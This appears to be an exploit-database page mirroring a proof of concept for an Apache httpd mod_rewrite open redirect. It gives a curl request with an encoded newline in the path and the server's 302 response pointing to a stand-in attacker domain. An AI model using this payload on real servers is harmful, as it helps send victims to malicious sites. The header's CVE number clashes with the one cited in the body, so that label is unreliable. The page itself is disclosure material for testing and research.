Advertisement






Apache Httpd mod_rewrite Open Redirects

CVE Category Price Severity
CVE-2021-4044 CWE-601 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-11-21
CPE
cpe:cpe:/a:apache:http_server
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.08275 0.91498

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110142

Below is a copy:

Apache Httpd mod_rewrite Open Redirects
Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):

```
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302 
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com
```

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum